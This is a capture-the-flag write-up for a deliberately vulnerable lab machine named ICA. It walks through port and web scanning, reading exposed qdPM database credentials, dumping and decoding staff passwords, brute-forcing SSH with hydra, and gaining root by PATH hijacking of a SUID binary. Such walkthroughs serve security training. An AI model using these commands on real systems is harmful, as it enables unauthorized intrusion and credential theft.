Ica
Port recognition withnmapor you can use recon
┌──(root@ghost)-[/home/ghost]
└─# recon ica.vuln
.o oOOOOOOOo OOOo
Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO
OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO
OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB'
`O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo
.OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO
OOOOO '"OOOOOOOOOOOOOOOO"` oOO
oOOOOOba. .adOOOOOOOOOOba .adOOOOo.
oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO
OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
"OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO"
Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`
: .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .
. oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
'%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
`$" `OOOO' `O"Y ' `OOOO' o .
. . OP" : o .
:
.
[R3C0N] by 0bfxgh0st 4 WWA with ❤
[OS] Linux (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-20 11:14 EST
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:14
Completed NSE at 11:14, 0.00s elapsed
Initiating ARP Ping Scan at 11:14
Scanning ica.vuln (10.0.2.48) [1 port]
Completed ARP Ping Scan at 11:14, 0.03s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 11:14
Scanning ica.vuln (10.0.2.48) [65535 ports]
Discovered open port 80/tcp on 10.0.2.48
Discovered open port 3306/tcp on 10.0.2.48
Discovered open port 22/tcp on 10.0.2.48
Discovered open port 33060/tcp on 10.0.2.48
Completed SYN Stealth Scan at 11:14, 1.51s elapsed (65535 total ports)
NSE: Script scanning 10.0.2.48.
Initiating NSE at 11:14
Completed NSE at 11:14, 0.00s elapsed
Nmap scan report for ica.vuln (10.0.2.48)
Host is up (0.000066s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
33060/tcp open mysqlx
MAC Address: 08:00:27:61:B2:CD (Oracle VirtualBox virtual NIC)
NSE: Script Post-scanning.
Initiating NSE at 11:14
Completed NSE at 11:14, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.77 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
[i] [WHATWEB]
http://ica.vuln:80 [200 OK] Apache[2.4.48], Bootstrap, Cookies[qdPM8], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.48 (Debian)], IP[10.0.2.48], JQuery[1.10.2], PasswordField[login[password]], Script[text/javascript], Title[qdPM | Login], X-UA-Compatible[IE=edge]
[+] [WFUZZ]
*stage 1 --> (light web path fuzzing wordlist:/usr/share/dirb/wordlists/common.txt)
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://ica.vuln:80/FUZZ
Total requests: 4614
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000013: 403 9 L 28 W 273 Ch ".htpasswd"
000000568: 301 9 L 28 W 306 Ch "backups"
000000598: 301 9 L 28 W 304 Ch "batch"
000001053: 301 9 L 28 W 303 Ch "core"
000001114: 301 9 L 28 W 302 Ch "css"
000000012: 403 9 L 28 W 273 Ch ".htaccess"
000001575: 200 0 L 3 W 884 Ch "favicon.ico"
000000011: 403 9 L 28 W 273 Ch ".hta"
000001991: 301 9 L 28 W 305 Ch "images"
000002021: 200 145 L 373 W 5660 Ch "index.php"
000002058: 301 9 L 28 W 306 Ch "install"
000002145: 301 9 L 28 W 309 Ch "javascript"
000002179: 301 9 L 28 W 301 Ch "js"
000000001: 200 145 L 373 W 5651 Ch "http://ica.vuln:80/"
000002441: 301 9 L 28 W 305 Ch "manual"
000003436: 200 2 L 3 W 26 Ch "robots.txt"
000003588: 403 9 L 28 W 273 Ch "server-status"
000003613: 301 9 L 28 W 301 Ch "sf"
000003994: 301 9 L 28 W 307 Ch "template"
000004216: 301 9 L 28 W 306 Ch "uploads"
Total time: 0
Processed Requests: 4614
Filtered Requests: 4594
Requests/sec.: 0
*stage 2 --> (light permutated extensions fuzzing wordlist:/usr/share/dirb/wordlists/common.txt)
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://ica.vuln:80/FUZZ.FUZ2Z
Total requests: 13842
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000032: 403 9 L 28 W 273 Ch ".hta - html"
000000034: 403 9 L 28 W 273 Ch ".htaccess - php"
000000031: 403 9 L 28 W 273 Ch ".hta - php"
000000001: 403 9 L 28 W 273 Ch "php"
000000036: 403 9 L 28 W 273 Ch ".htaccess - txt"
000000037: 403 9 L 28 W 273 Ch ".htpasswd - php"
000000035: 403 9 L 28 W 273 Ch ".htaccess - html"
000000039: 403 9 L 28 W 273 Ch ".htpasswd - txt"
000000038: 403 9 L 28 W 273 Ch ".htpasswd - html"
000000033: 403 9 L 28 W 273 Ch ".hta - txt"
000000002: 403 9 L 28 W 273 Ch "html"
000002563: 200 0 L 0 W 0 Ch "check - php"
000006049: 200 145 L 373 W 5660 Ch "index - php"
000009879: 200 12 L 68 W 470 Ch "readme - txt"
000010305: 200 2 L 3 W 26 Ch "robots - txt"
Total time: 0
Processed Requests: 13842
Filtered Requests: 13827
Requests/sec.: 0
recon reports port 22 for ssh, 80 for http, 3306 for mysql and 33060 for mysqlx. Whatweb show us what technology run in the webserver
┌──(root@ghost)-[/home/ghost]
└─# searchsploit qdPM 9.2
------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------ ---------------------------------
qdPM 9.2 - Password Exposure (Unauthenticated) | php/webapps/50176.txt
------------------------------------------------------------------------------------------------------------ ---------------------------------
┌──(root@ghost)-[/home/ghost]
└─# cat /usr/share/exploitdb/exploits/php/webapps/50176.txt
...
The password and connection string for the database are stored in a yml file. To access the yml file you can go to http://<website>/core/config/databases.yml file and download.
There is a public exploit for qdPM 9.2, but we can find databases.yml file by navigating through indexed files in /core/config folder
┌──(root@ghost)-[/home/ghost]
└─# curl http://ica.vuln/core/config/databases.yml
all:
doctrine:
class: sfDoctrineDatabase
param:
dsn: 'mysql:dbname=qdpm;host=localhost'
profiler: false
username: qdpmadmin
password: "<?php echo urlencode('UcVQCMQk2STVeS6J') ; ?>"
attributes:
quote_identifier: true
It seems that we have some credentials for mysql service
┌──(root@ghost)-[/home/ghost]
└─# mysql -u qdpmadmin -p -h ica.vuln
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 16
Server version: 8.0.26 MySQL Community Server - GPL
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| qdpm |
| staff |
| sys |
+--------------------+
6 rows in set (0.007 sec)
MySQL [(none)]>
We are on the database time to inspect
MySQL [staff]> select name from staff.user;
+--------+
| name |
+--------+
| Smith |
| Lucas |
| Travis |
| Dexter |
| Meyer |
+--------+
5 rows in set (0.001 sec)
MySQL [staff]> select password from staff.login;
+--------------------------+
| password |
+--------------------------+
| c3VSSkFkR3dMcDhkeTNyRg== |
| N1p3VjRxdGc0MmNtVVhHWA== |
| WDdNUWtQM1cyOWZld0hkQw== |
| REpjZVZ5OThXMjhZN3dMZw== |
| Y3FObkJXQ0J5UzJEdUpTeQ== |
+--------------------------+
5 rows in set (0.001 sec)
MySQL [staff]>
We obtained some users and base64 encoded passwords
┌──(root@ghost)-[/home/ghost]
└─# cat users.txt
smith
lucas
travis
dexter
meyer
┌──(root@ghost)-[/home/ghost]
└─# cat pass.txt
suRJAdGwLp8dy3rF
7ZwV4qtg42cmUXGX
X7MQkP3W29fewHdC
DJceVy98W28Y7wLg
cqNnBWCByS2DuJSy
After decoding base64 passwords we created two files to bruteforce ssh service
┌──(root@ghost)-[/home/ghost]
└─# hydra -L users.txt -P pass.txt ica.vuln ssh -t 4
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-12-20 12:15:51
[DATA] max 4 tasks per 1 server, overall 4 tasks, 25 login tries (l:5/p:5), ~7 tries per task
[DATA] attacking ssh://ica.vuln:22/
[22][ssh] host: ica.vuln login: travis password: DJceVy98W28Y7wLg
[22][ssh] host: ica.vuln login: dexter password: 7ZwV4qtg42cmUXGX
1 of 1 target successfully completed, 2 valid passwords found
We found two valid users to log through ssh
┌──(root@ghost)-[/home/ghost]
└─# ssh travis@ica.vuln
The authenticity of host 'ica.vuln (10.0.2.48)' can't be established.
ED25519 key fingerprint is SHA256:xCJPzSxRekyYT6eXmyzAXdY7uAlP5b7vQp+B5XqYsfE.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'ica.vuln' (ED25519) to the list of known hosts.
travis@ica.vuln's password:
Linux debian 5.10.0-8-amd64 #1 SMP Debian 5.10.46-5 (2021-09-23) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Sep 25 14:55:01 2021 from 192.168.1.7
travis@debian:~$ cat user.txt
ICA{Secret_Project}
We are in the system now as travis user, we can do user pivoting with dexter and the other password but is not relevant to get root
travis@debian:~$ find / -perm /4000 2>/dev/null
/opt/get_access
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
Let's check /opt/get_access
travis@debian:~$ ls -la /opt/get_access
-rwsr-xr-x 1 root root 16816 Sep 25 2021 /opt/get_access
travis@debian:~$ strings /opt/get_access
/lib64/ld-linux-x86-64.so.2
setuid
socket
puts
system
__cxa_finalize
setgid
__libc_start_main
libc.so.6
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
cat /root/system.info
Could not create socket to access to the system.
All services are disabled. Accessing to the system is allowed only within working hours.
;*3$"
GCC: (Debian 10.2.1-6) 10.2.1 20210110
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
...
We can see a setuid call, system call and cat command to a file in root folder
travis@debian:~$ echo '/bin/bash' > /tmp/cat && chmod +x /tmp/cat
travis@debian:~$ export PATH=/tmp:$PATH
travis@debian:~$ /opt/get_access
root@debian:~# more /root/root.txt
ICA{Next_Generation_Self_Renewable_Genetics
After abusing suid binary we will get root